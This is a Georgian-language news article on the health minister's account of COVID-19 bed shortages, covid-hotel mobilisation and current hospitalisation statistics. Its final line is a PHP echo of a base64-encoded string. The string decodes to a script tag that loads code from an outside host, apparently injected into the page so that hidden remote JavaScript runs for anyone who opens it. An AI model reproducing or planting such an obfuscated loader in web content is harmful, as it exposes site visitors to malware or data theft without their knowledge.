celsiusi
ავერსი საქკაბელი
ანდაცვის მინისტრმა საკოორდინაციო საბჭოს დასრულების შემდეგ ჟურნალისტების კითხვაზე - რამდენად შესაძლებელია საწოლფონდის მობილიზების პროგნოზირება, უპასუხა, რომ ინფიცირების ნახტომისებური მატების პერიოდში ეს შეუძლებელია.
 
როგორც ეკატერინე ტიკარაძემ განმარტა, გასულ და მიმდინარე კვირაში ინფიცირების 3 ნახტომისებური მატება დაფიქსირდა. მისი ინფორმაციით, დღეისთვის საწოლფონდის დეფიციტის თავიდან ასაცილებლად კვლავ სასტუმროების მობილიზებაზე მიმდინარეობს მუშაობა და ამასთანავე კლინიკებიც გაფრთხილებული არიან, საჭიროების შემთხვევაში მოთხოვნილი საწოლები კოვიდის სამართავად გამოყონ.
 
„ყველა კლინიკამ გამომდინარე იქიდან, რომ ჩვენ ვართ და ვრჩებით პანდემიაში, შეთანხმებულად იცის რომ 72 საათის ადრე შეგვიძლია მივცეთ ბრძანება იმ მოთხოვნაზე, რისი საჭიროებაც დგება. ვირუსის გავრცელების კომპონენტში წინა ერთ კვირაში ორი ნახტომისებრი მატება, ხოლო ამ კვირაში ერთი ნახტომისებური მატება დაგვიფიქსირდა. დაავადებათა კონტროლის ცენტრს და ეპიდემიოლოგებს ამის პროგნოზირების შესაძლებლობა არ ჰქონდათ, რადგან ნახტომი ყოველთვის მოულოდნელია. მიუხედავად ამისა, კერძო სექტორის და ჰოსპიტლების თანამშრომლობა საკმაოდ კარგია და გაშვებულ სიგნალზე მათი რეაგირებაც შესაბამისია. თუმცა იქიდან გამომდინარე, რომ ჩვენ ინტენსიურად ვიყენებდით სასტუმროებს და დღეს იმ სასტუმროების უმრავლესობა, რომელიც კლინიკურ მართვაში იყო ჩართული ტურიზმის სექტორშია და მათთვის დამახასიათებელი სამუშაოთია დაკავებული, ისინი არ არიან ჩართულები.
 
დღეს კოვიდ-სასტუმროების ინტენსიური მობილიზება მიმდინარეობს, რათა ისეთი პაციენტები, რომლებიც მხოლოდ შფოთავენ, კლინიკებში და ექიმის მეთვალყურეობის ქვეშ არ მოხვდნენ, სასტუმროებში გადავიყვანოთ. დღეს ჩვენს მოთხოვნაზე ტურიზმის ადმინისტრაციას ჰქონდა რეაგირება, მათ მობილიზებული აქვთ 2000-მდე საწოლი, საიდანაც 1500 საწოლი უკვე დაკავებულია და 500 საწოლის მობილიზება შემდეგ ორ დღეში მოხდება. ვფიქრობთ, რომ ამ სექტორის ჩართულობით ინფიცირებულების იმ რაოდენობის გამკლავებას შევძლებთ, რომელიც დღეს გვყავს“, - განმარტა ეკატერინე ტიკარაძემ.
 
მისი თქმით, დღეისთვის საწოლების დეფიციტი მხოლოდ თბილისშია.
 
„საწოლფონდის ნაწილში დღეისთვის დეფიციტური მხოლოდ თბილისი გვაქვს, ხოლო რეგიონებში 1 258 საწოლია თავისუფალი. სამწუხაროდ პედიატრიულ საწოლებზე პრობლემაა და მიმდინარეობს ინტენსიური მუშაობა და რესპუბლიკური საავადმყოფოს გარდა ამ პროცესში სხვა კლინიკების ერთვებიან და ჩაერთვებიან. რამდენი სასტუმრო ჩაერთვება ამის თქმა არ შემიძლია, რადგან ეს რიცხვი მუდმივი მოლაპარაკების საგანია“, - განმარტა მინისტრმა.
 
ამასთან ეკატერინე ტიკარაძემ კლინიკებში პაციენტების პირდაპირი გადაყვანის საკითხი არ მოიწონა და კლინიკებს ამ პრაქტიკის აღმოფხვრისკენ მოუწოდა.
 
„გუშინ კლინიკებთან შეხვედრისას გამოიკვეთა ხარვეზი, რომლის მიხედვით კლინიკასა და პაციენტებს შორის პირდაპირი შეთანხმების შედეგად პაციენტის კლინიკაში გადაყვანა ხდება, ამავე დროს ძალიან ცუდ მდგომარეობაში არიან სასწრაფოს ექიმები, რომლებიც პაციენტს ვერ უმტკიცებენ, რომ მხოლოდ შფოთვა კლინიკაში გადაყვანის საფუძველი არ არის. ამასთან დაკავშირებით გვქონდა კლინიკებთან კომუნიკაცია და ვთხოვეთ, პირადი ჩართულობით არ მოხდეს პაციენტების კლინიკაში გადაყვანა და ყველამ შევეცადოთ მოძრაობის წესები, რომელიც ექიმების ერგონომიულ მუშაობას და პაციენტების ტრანსპორტირებას უზრუნველყოფს იმ ლოკაციაზე, რომელიც მისი ჯანმრთელობის მდგომარეობას შეესაბამება, დავიცვათ. ასევე ინტენსიურად ჩართულია კლინიკური ჯგუფი, რომელიც პაციენტების მონიტორინგზე კლინიკაში მუშაობს, რათა ჰოსპიტლებში პაციენტების ზედმეტად დაყოვნება არ მოხდეს", - განაცხადა ტიკარაძემ.
 
ცნობისთვის, ამ ეტაპზე ინფიცირების მიმდინარე აქტიური შემთხვევა არის 21 834 საიდანაც 4 780 ადამიანი მკურნალობს საავადმყოფოში, მათ შორის, თბილისის საავადმყოფოებში - 2 711, აჭარაში - 374, იმერეთში - 593.
 
მძიმე პაციენტია 934 პირი, მათ შორის, თბილისში - 450, აჭარაში - 61, იმერეთში -205. ხელოვნური სუნთქვის აპარატზე იმყოფება 205 პირი, მათგან თბილისში - 155, აჭარაში - 4, იმერეთში - 11.
 
1 487 ადამიანი მოთავსებულია კლინიკურ-სასტუმროებში, მათ შორის 831 - თბილისში, 464- აჭარაში. 15 567 პირი ვირუსის მკურნალობის კურსს გადის საცხოვრებელ ბინაზე. საკარანტინე სივრცეებში მოთავსებულია 50 ადამიანი, მათ შორის, თბილისში - 40, ხოლო აჭარაში - 10.
1014
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");